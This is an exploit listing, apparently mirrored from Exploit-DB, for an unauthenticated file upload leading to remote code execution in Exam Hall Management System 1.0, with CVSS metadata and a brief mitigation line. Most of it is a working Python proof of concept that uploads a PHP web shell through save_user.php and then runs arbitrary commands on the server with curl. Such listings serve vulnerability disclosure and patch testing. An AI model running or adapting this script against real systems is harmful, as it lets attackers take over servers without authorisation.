Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)

vendor:

Exam Hall Management System

by:

Davide 'yth1n' Bianchin

9,8

CVSS

HIGH

Unrestricted File Upload + RCE

434

CWE

Product Name: Exam Hall Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Kali Linux

2021

Exam Hall Management System 1.0 – Unrestricted File Upload + RCE (Unauthenticated)

This exploit allows an unauthenticated attacker to upload a malicious file to the Exam Hall Management System 1.0 web application and execute arbitrary code on the server. The vulnerability exists due to the lack of authentication and validation of the uploaded file. An attacker can exploit this vulnerability by uploading a malicious file containing arbitrary code to the web application. The malicious file can then be used to execute arbitrary code on the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all uploaded files are properly validated and authenticated before being accepted by the web application.

Source

Exploit-DB raw data:

# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)
# Exploit Author: Davide 'yth1n' Bianchin
# Contacts: davide dot bianchin at dedagroup dot it
# Original PoC: https://exploit-db.com/exploits/50103
# Date: 06.07.2021
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
# Version: 1.0
# Tested on: Kali Linux

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import os
import sys
import string
import random
import time

host = 'localhost' #CHANGETHIS
path = 'SourceCode' #CHANGETHIS

url = 'http://'+host+'/'+path+'/pages/save_user.php'

def id_generator(size=6, chars=string.ascii_lowercase):
	return ''.join(random.choice(chars) for _ in range(size))+'.php'

if len(sys.argv) == 1:
    print("#########")
    print("Usage: python3 examhallrce.py command")
    print("Usage: Use the char + to concatenate commands")
    print("Example: python3 examhallrce.py whoami")
    print("Example: python3 examhallrce.py ls+-la")
    print("#########")
    exit()


filename = id_generator()
print("Generated "+filename+ " file..")
time.sleep(2)
print("Uploading file..")
time.sleep(2)

   


def reverse():
    command = sys.argv[1]
    multipart_data = MultipartEncoder({
        'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'),
        'btn_save': ''
        })
    r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type})   
    endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' 
    urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+''
    print("Success, file correctly uploaded at: " +endpoint+ "")
    time.sleep(1) 
    print("Executing command in 1 seconds:\n")
    time.sleep(1)
    os.system("curl -X GET "+urlo+"")

reverse()